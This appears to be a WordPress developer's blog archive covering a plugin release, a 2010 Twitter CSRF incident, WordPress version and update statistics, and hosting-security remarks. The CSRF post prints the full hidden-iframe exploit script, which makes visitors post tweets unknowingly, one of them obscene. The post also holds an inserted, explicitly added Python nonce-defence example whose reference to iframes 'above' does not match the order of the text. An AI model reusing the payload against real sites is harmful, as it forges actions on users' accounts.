New Plugin: Filtered HTML for Editors

I just released a new plugin, Filtered HTML for Editors.

This is in response to a published report suggesting there is a vulnerability in WordPress 3.0.4. The report is invalid, but I’m offering this plugin for sites that do not trust users given the Editor role.

For more information, please read my blog post on the WordPress Development Updates blog, and read the plugin’s description and FAQ.

CSRF attack strikes Twitter

I mean, who didn’t see this coming?

Twitter allows a URL to send a tweet. Many sites and retweet buttons and such rely on it. No POST, no nonce, nothing. Just a simple HTTP GET triggers a tweet. Clearly, someone was going to exploit this eventually.

Authentication is not the same as intention. It is not enough to determine that a user is allowed to do something; you must also determine that they intended to do it. When intent is not established, and especially when the form can be submitted via a GET request, these kinds of exploits become child’s play, as you can see from the complete exploit code below. It’s called a cross-site request forgery, or CSRF (or XSRF).

How do you determine intention? You’ll want to avoid accepting information over GET, but really that does nothing on its own. The next step would be to check the HTTP Referer header, but that can be spoofed. Since that isn’t foolproof, you need to use something like a nonce check, like what we use in WordPress. For Twitter to secure the site from a CSRF vulnerability, they’ll be breaking a lot of embedded tools and buttons on many, many sites, so for now they’ve apparently disabled the share endpoint that was exploited.
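To make the difference between authentication and intention concrete, here is an added example (not code from the post, and not WordPress’s own implementation). It models a nonce scheme after the one WordPress uses: an HMAC over the action name, the user id and a time tick, where the current and the previous tick are accepted. The handler names, the session table and the secret are all constructed for the example. The vulnerable handler accepts any request that carries the victim’s session cookie, which is exactly what the hidden iframes above rely on; the hardened handler additionally requires a POST and a valid nonce for the logged-in user and the specific action.

```python
import hashlib
import hmac
import time
from dataclasses import dataclass
from typing import Optional

# Constructed example secret: in a real deployment this comes from configuration, never source.
SECRET_KEY = b"constructed-example-secret-do-not-reuse"
NONCE_LIFE = 12 * 60 * 60          # 12-hour lifetime, split into two ticks (WordPress-style)
HALF_LIFE = NONCE_LIFE / 2


def _tick(now: float) -> int:
    """Time bucket the nonce is bound to; a nonce from the previous bucket is still accepted."""
    return int(now // HALF_LIFE)


def create_nonce(user_id: int, action: str, now: Optional[float] = None) -> str:
    """HMAC(secret, tick|user|action), truncated to 10 hex chars (length chosen for the example)."""
    now = time.time() if now is None else now
    msg = f"{_tick(now)}|{user_id}|{action}".encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()[:10]


def verify_nonce(nonce: str, user_id: int, action: str, now: Optional[float] = None) -> bool:
    """True if the nonce matches this user and action for the current or previous tick."""
    now = time.time() if now is None else now
    for offset in (0.0, HALF_LIFE):
        expected = create_nonce(user_id, action, now - offset)
        # Constant-time comparison; encode so non-ASCII input cannot raise in compare_digest.
        if hmac.compare_digest(expected.encode(), str(nonce).encode()):
            return True
    return False


@dataclass
class Request:
    method: str
    params: dict      # query string or form fields
    cookies: dict     # the browser attaches these to cross-site requests too


@dataclass
class Response:
    status: int
    body: str


# Constructed session table: session cookie value -> user id.
SESSIONS = {"sess-abc": 42}
ACTION = "update-status"


def authenticated_user(req: Request) -> Optional[int]:
    return SESSIONS.get(req.cookies.get("session", ""))


def update_status_vulnerable(req: Request) -> Response:
    """Authentication only: any request carrying a valid session cookie is honoured, GET included."""
    user = authenticated_user(req)
    if user is None:
        return Response(401, "login required")
    return Response(200, f"user {user} posted: {req.params.get('status', '')}")


def update_status_hardened(req: Request) -> Response:
    """Authentication plus intention: POST only, and a nonce minted for this user and this action."""
    user = authenticated_user(req)
    if user is None:
        return Response(401, "login required")
    if req.method != "POST":
        return Response(405, "state change requires POST")
    if not verify_nonce(req.params.get("_nonce", ""), user, ACTION):
        return Response(403, "intent not established (bad or missing nonce)")
    return Response(200, f"user {user} posted: {req.params.get('status', '')}")


def render_form_nonce(user_id: int) -> str:
    """What the site's own page would embed in its form as a hidden field."""
    return create_nonce(user_id, ACTION)


def simulate() -> dict:
    """Replay the cross-site pattern from the post against both handlers, plus the legitimate flow."""
    victim_cookies = {"session": "sess-abc"}
    # A hidden iframe pointing at the endpoint: a GET with the victim's cookie and no nonce.
    forged_get = Request("GET", {"status": "WTF: http://attacker.example/"}, victim_cookies)
    # An auto-submitted cross-site form: a POST, still without a nonce the attacker cannot know.
    forged_post = Request("POST", {"status": "forged"}, victim_cookies)
    # The site's own form, carrying the nonce it rendered for user 42.
    legit = Request("POST", {"status": "hello", "_nonce": render_form_nonce(42)}, victim_cookies)
    # A nonce minted for a different user does not transfer.
    wrong_user = Request("POST", {"status": "x", "_nonce": render_form_nonce(7)}, victim_cookies)
    return {
        "vulnerable_forged_get": update_status_vulnerable(forged_get).status,
        "hardened_forged_get": update_status_hardened(forged_get).status,
        "hardened_forged_post": update_status_hardened(forged_post).status,
        "hardened_legit": update_status_hardened(legit).status,
        "hardened_wrong_user": update_status_hardened(wrong_user).status,
    }


if __name__ == "__main__":
    for name, status in simulate().items():
        print(f"{name}: {status}")
```

The nonce is tied to the user and the action, so a token leaked from one form cannot be replayed against another endpoint or another account, and the time tick bounds how long a stolen token stays useful. Requiring POST is still worth doing, since it stops the simplest iframe and image-tag attacks, but only the nonce check actually establishes intent.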

For the WordPress developers out there, probably the best read out there is this post by Mark Jaquith, from four years ago. It still applies as if it was written yesterday. For the non-WordPress developers, it’s still a great read as it explains what’s really going on, how WordPress prevents it, and why intention is important (if that isn’t obvious enough).

Once again, Twitter users are victims, thanks to the lack of basic security practices.

Update: Check out TechCrunch’s coverage. They quote a certain commenter who explained the issue. :-)

Here’s the exploit:

<script type="text/javascript">
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>

Update your WordPress

Updates are easy. They should be easier. Check out our proposal at the end of this post.

This week at the Black Hat conference in Las Vegas, security company Qualys presented and released BlindElephant, a utility that scans web sites for insecure web applications. Their research identified that 70 percent of sites running Drupal are affected by critical vulnerabilities, and that the statistics only get worse for Joomla (92%), MediaWiki (95%) and phpBB (100%). [1]

I received a press release about BlindElephant earlier this week. At the time, I didn’t think much of it. It surely would have gotten my attention, however, had it included their WordPress statistic — 4 percent. (What did catch my attention was this IDG article.)

The application, the source for which Qualys released, isn’t about identifying critical vulnerabilities; it’s about identifying the versions of software that websites run. They made their own determinations of which versions had “critical vulnerabilities.” [2] Check out their slides and white paper, both packed with great information and statistics.

For WordPress, they cited version 2.5.1 as the earliest release outside the critical barrier, which fixed an important security flaw in our secret key implementation.

In case you didn’t already know, 2.5.1 is not secure. We’ve made countless incremental improvements to the security of WordPress in the four major versions and many maintenance and security releases over the last two years.

Alas, WordPress has a security perception issue. It’s widely used and widely targeted. Plugins have extended it every which way. Of course, “My WordPress was hacked!!!!111” doesn’t mean that WP is the attack vector. It very rarely is.

But at the same time, WordPress is easy to use and easy to upgrade. Among major open source web applications, it quite possibly leads in both categories, and its developers and contributors have worked hard to make it that way.

That brings me back to BlindElephant. Their white paper says they checked more than 25,000 WordPress installs and found the vast majority of them to be running WordPress 2.9 or higher. Qualys cited the “application’s easy, reliable updating design” as why we have such a clear advantage. I’m down with that.

WordPress 3.0.1 and beyond

This post’s title comes from the 3.0.1 haiku. If you’re not running 3.0.1, please update. It’s easy, almost always painless, and will provide you (and me) peace of mind. But we do have goals to make it even easier. With that, I leave you with one such proposal, from Daryl Koopersmith (@darylkoop) and me: if you fall behind on your updates, we’re thinking a modal dialog box with a twist. What do you think? [3]

Notes:

  1. The Drupal number may be slightly high, as this comment points out, as Drupal 5.22 may have been incorrectly classified as critical. (Their slides were not kind to Drupal, so I am unsure of the intention.)
  2. WordPress and Drupal in particular received additional attention from the researchers, as a few dozen popular plugins and modules were also inspected.
  3. Please know we’re not being serious. We do have plans, but this isn’t it. Well, probably.

MediaTemple, WordPress, and attack vectors

WordPress has been mentioned a lot lately. Is this application specifically vulnerable?

No. WordPress is a high-quality project that updates their software whenever a security problem is found. The latest versions do not contain any vulnerabilities that we are aware of. If you are running an old version, please update yourself. This is a common practice and should be familiar to any Windows or Mac OS X desktop user.

This being said, due to its ubiquity as one of the world’s most popular open-source publishing systems, WordPress is often the target of the payload with code injections and backdoor entry points after the attackers have maliciously gained access to a user’s website. The fact that WordPress is frequently a payload target DOES NOT mean that WordPress itself is vulnerable. It just means it’s popular and very powerful. You should continue to use it and we think it’s great software.

I couldn’t have said it better myself. Thanks MediaTemple.

GoDaddy

At the risk of this getting drowned out with everything else abuzz in the WordPress community:

On Thursday, I am visiting GoDaddy headquarters. Please post any questions you may have for them and I will see to it that they get answered.

Some background: GoDaddy hosts a few hundred thousand WordPress sites, many through a special package. They have been bitten by the same attacks affecting other hosting companies. I previously mentioned GoDaddy when compiling my thoughts on WordPress security and the shared hosting attacks, and I didn’t mince words then.

What should I ask?